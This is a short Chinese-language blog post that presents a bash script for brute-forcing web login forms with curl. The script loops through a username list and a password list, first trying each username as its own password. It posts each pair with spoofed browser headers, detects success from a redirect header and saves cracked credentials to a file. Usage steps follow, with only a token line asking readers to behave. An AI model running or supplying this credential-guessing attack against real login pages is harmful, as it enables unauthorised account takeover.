使用CURL进行蛮力密码破解
先上脚本
#!/usr/bin/env bash USERCOUNT=$(wc -l user.txt | cut -d' ' -f1) PWDCOUNT=$(wc -l password.txt | cut -d' ' -f1) for ((i=1; i<=$USERCOUNT; i++)); do USERNAME=`sed -n $i'p' user.txt` PASSWORD=$USERNAME echo "[$i][-]username=$USERNAME, password=$PASSWORD" echo "" curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp cat ./temp FOUND=`grep 'https://localhost/loginsuccess' ./temp` if [ "$FOUND" != "" ]; then echo 'FOUND!' cat >> hit.txt <<EOS username=$USERNAME, password=$PASSWORD EOS continue fi echo 'sleep 2 seconds.' echo '' sleep 2 for ((j=1; j<=$PWDCOUNT; j++)); do PASSWORD=`sed -n $j'p' password.txt` echo "[$i][$j]username=$USERNAME, password=$PASSWORD" echo "" curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp cat ./temp FOUND=`grep 'https://localhost/loginsuccess' ./temp` if [ "$FOUND" != "" ]; then echo 'FOUND!' cat >> hit.txt <<EOS username=$USERNAME, password=$PASSWORD EOS break fi echo 'sleep 2 seconds.' echo '' sleep 2 done echo 'sleep 10 seconds.' echo '' sleep 10 done
将用户名列表保存为unix风格的user.txt
将密码列表保存为unix风格的password.txt
调整时间间隔
在curl返回的ResponseHeader里查找登录成功的标记(*关键)
开跑吧
本来是直接将ResponseHeader直接输出到/dev/stdout后搜索的
FOUND=`curl blabla -D /dev/stdout | grep 'https://localhost/loginsuccess'`
但不能直接看到ResponseHeader还是不太踏实Orz
大家请自重
春日戀歌好棒,好喜歡…thk’s